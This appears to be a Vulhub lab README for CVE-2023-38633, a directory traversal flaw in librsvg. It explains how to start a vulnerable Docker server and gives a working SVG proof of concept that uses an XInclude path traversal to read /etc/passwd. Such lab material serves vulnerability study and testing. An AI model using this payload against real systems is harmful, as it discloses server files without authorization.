Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
43 lines
1.5 KiB
Markdown
43 lines
1.5 KiB
Markdown
# Librsvg XInclude Arbitrary file reading (CVE-2023-38633)
|
|
|
|
[中文版本(Chinese version)](README.zh-cn.md)
|
|
|
|
Librsvg is a free software SVG rendering library written as part of the GNOME project, intended to be lightweight and portable.
|
|
|
|
A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used by local or remote attackers to disclose files (on the local filesystem outside of the expected area), as demonstrated by `href=".?../../../../../../../../../../etc/passwd` in an xi:include element.
|
|
|
|
References:
|
|
|
|
- <https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/>
|
|
- <https://gitlab.gnome.org/GNOME/librsvg/-/issues/996>
|
|
|
|
## Vulnerable Environment
|
|
|
|
Executing following command to start a PHP server that uses librsvg 2.50.7 to handle SVG images:
|
|
|
|
```
|
|
docker compose up -d
|
|
```
|
|
|
|
After the server is started, browse `http://your-ip:8080` to see the upload page.
|
|
|
|
## Exploit
|
|
|
|
Use `<xi:include>` to read the local file by this POC:
|
|
|
|
```xml
|
|
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
|
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
|
|
<rect width="300" height="300" style="fill:rgb(255,255,255);" />
|
|
<text x="10" y="100">
|
|
<xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
|
|
<xi:fallback>file not found</xi:fallback>
|
|
</xi:include>
|
|
</text>
|
|
</svg>
|
|
```
|
|
|
|
Upload this SVG image to server, you will see the `/etc/passwd` that is embedded in the output image:
|
|
|
|
|